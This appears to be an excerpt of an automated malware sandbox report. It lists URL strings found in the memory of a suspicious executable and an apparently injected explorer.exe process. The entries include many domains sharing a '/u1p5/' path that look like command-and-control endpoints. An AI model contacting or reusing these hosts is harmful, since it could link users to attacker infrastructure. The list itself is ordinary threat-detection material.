          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apeutah.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apeutah.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apeutah.com/u1p5/www.jovam.xyz
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apeutah.comReferer:
          Source: explorer.exe, 0000000F.00000000.363498621.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.434119185.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.348701953.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.382832125.0000000006840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dasmonica.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dasmonica.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dasmonica.com/u1p5/www.freeclothesonline.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dasmonica.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.deutscheno1.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.deutscheno1.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.deutscheno1.com/u1p5/www.yannickrast.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.deutscheno1.comReferer:
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmp, H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freeclothesonline.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freeclothesonline.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freeclothesonline.com/u1p5/www.apeutah.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freeclothesonline.comReferer:
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hokabrazil.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hokabrazil.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hokabrazil.com/u1p5/www.hornnbach.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hokabrazil.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hornnbach.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hornnbach.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hornnbach.com/u1p5/www.piertrafesa.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hornnbach.comReferer:
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jovam.xyz
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jovam.xyz/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jovam.xyz/u1p5/www.hokabrazil.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jovam.xyzReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kailibianminwang.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kailibianminwang.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kailibianminwang.com/u1p5/.
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kailibianminwang.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pbcgotv.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pbcgotv.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pbcgotv.com/u1p5/www.kailibianminwang.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pbcgotv.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piertrafesa.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piertrafesa.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piertrafesa.com/u1p5/www.vinewineltd.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piertrafesa.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rhoads-music.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rhoads-music.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rhoads-music.com/u1p5/www.verifyaxcx.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rhoads-music.comReferer:
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
